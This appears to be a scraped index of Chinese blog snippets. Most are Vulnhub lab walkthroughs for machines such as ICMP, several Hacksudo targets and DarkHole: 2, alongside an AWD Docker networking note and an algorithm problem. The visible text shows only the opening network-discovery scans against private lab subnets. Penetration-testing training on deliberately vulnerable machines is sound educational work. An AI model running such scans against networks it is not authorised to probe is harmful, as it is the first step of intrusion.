  • Vulnhub之ICMP靶机详细解题过程
    ICMP作者:jason_huawen靶机基本信息名称:ICMP:1地址:https://www.vulnhub.com/entry/icmp-1,633/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub]└─$sudonetdisc......
  • Vulnhub之Hacksudo LPE靶机详细解题过程
    HacksudoLPE作者:Jason_huawen靶机基本信息名称:hacksudo:L.P.E.地址:hacksudo:L.P.E.~VulnHub识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]└─......
  • Vulnhub之Hacksudo Alien靶机解题过程
    HacksudoAlien识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Hacksudo_Alien]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.80.0/16|ScreenV......
  • Vulnhub之Hacksudo 3靶机解题过程
    Hacksudo3识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo3]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.61.0/16|ScreenView:Unique......
  • VulnHub靶场渗透实战8-DarkHole: 2
    靶场地址:DarkHole:2~VulnHubDescriptionBacktotheTopDifficulty:HardThisworksbetterwithVMwareratherthanVirtualBoxHint:Don'twasteyourtimeForB......
  • Vulnhub之Hacksudo ProximaCentaur靶机解题过程
    HacksudoProximaCentaur识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo_ProximaCentaur]└─$sudonetdiscover-ieth1Currentlyscanning:172.16.2.0/16......
  • AWD4-如何指定靶机的IP地址
    如何指定靶机的ip地址awd比赛中,应该每一台靶机占用一个ip地址,但是我们使用docker的情况下,可以使用桥接网络给容器分配ip地址,但是只支持容器之间的一个访问,不能分配容器与......
  • Vulnhub之Hacksudo FOG靶机解题过程
    HacksudoFOG识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.83.0/16|ScreenVi......
  • BZOJ3747-[POI2015]Kinoman
    Description共有m部电影,编号为1~m,第i部电影的好看值为w[i]。在n天之中(从1~n编号)每天会放映一部电影,第i天放映的是第f[i]部。你可以选择l,r(1<=l<=r<=n),并观......